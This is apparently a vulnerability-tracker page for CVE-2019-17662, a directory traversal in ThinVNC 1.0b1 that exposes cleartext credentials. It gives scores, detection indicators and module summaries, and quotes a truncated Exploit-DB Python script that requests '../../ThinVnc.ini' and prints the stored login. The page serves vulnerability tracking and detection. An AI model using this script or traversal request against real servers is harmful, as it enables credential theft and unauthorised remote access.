CVE-2019-17662
published 2019-10-16CVE-2019-17662: ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned…
PriorityP182critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
96.76%
99.9th percentile
ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cybelsoft | thinvnc | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →HTTP response body contains both 'User=' and 'Password=' strings, indicating successful ThinVnc.ini file read via directory traversal. ↗
- →HTTP response Content-Type header contains 'application/binary' when ThinVnc.ini is successfully retrieved. ↗
- →HTTP GET request to a path containing '../../ThinVnc.ini' is the canonical exploit pattern for this CVE; monitor web server logs for this traversal sequence. ↗
- →The vulnerability is exploitable even when authentication is enabled; unauthenticated HTTP GET requests to the traversal path should be alerted on regardless of auth state. ↗
- ·The vulnerability affects ThinVNC 1.0b1 and prior, including the 'ThinVNC_Latest' build dated 2018-12-07; scope detection rules accordingly. ↗
- ·Credentials (username and password) are stored in cleartext inside ThinVnc.ini; if the file is read, full authentication bypass is achieved without any further exploitation. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ThinVNC 1.0b1 - Authentication Bypass
exploitdb·2019-10-17·CVSS 9.8
CVE-2019-17662 [CRITICAL] ThinVNC 1.0b1 - Authentication Bypass
ThinVNC 1.0b1 - Authentication Bypass
---
# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
# Date: 2019-10-17
# Exploit Author: Nikhith Tumamlapalli
# Contributor WarMarX
# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
# Version: 1.0b1
# Tested on: Windows All Platforms
# CVE : CVE-2019-17662
# Description:
# Authentication Bypass via Arbitrary File Read
#!/usr/bin/python3
import sys
import os
import requests
def exploit(host,port):
url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
r = requests.get(url)
body = r.text
print(body.splitlines()[2])
print(body.splitlines()[3])
def main():
if(len(sys.argv)!=3):
print("Usage:\n{} \n".format(sys.argv[0]))
prin
Metasploit
ThinVNC Directory Traversal
metasploit
ThinVNC Directory Traversal
ThinVNC Directory Traversal
This module exploits a directory traversal vulnerability in ThinVNC versions 1.0b1 and prior which allows unauthenticated users to retrieve arbitrary files, including the ThinVNC configuration file. This module has been tested successfully on ThinVNC versions 1.0b1 and "ThinVNC_Latest" (2018-12-07).
Nuclei
ThinVNC 1.0b1 - Authentication Bypass
nuclei·CVSS 9.8
CVE-2019-17662 [CRITICAL] ThinVNC 1.0b1 - Authentication Bypass
ThinVNC 1.0b1 - Authentication Bypass
ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
Template:
id: CVE-2019-17662
info:
name: ThinVNC 1.0b1 - Authentication Bypass
author: DhiyaneshDK
severity: critical
description: |
ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be r
http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.htmlhttps://github.com/bewest/thinvnc/issues/5https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.pyhttps://redteamzone.com/ThinVNC/http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.htmlhttps://github.com/bewest/thinvnc/issues/5https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.pyhttps://redteamzone.com/ThinVNC/
2019-10-16
Published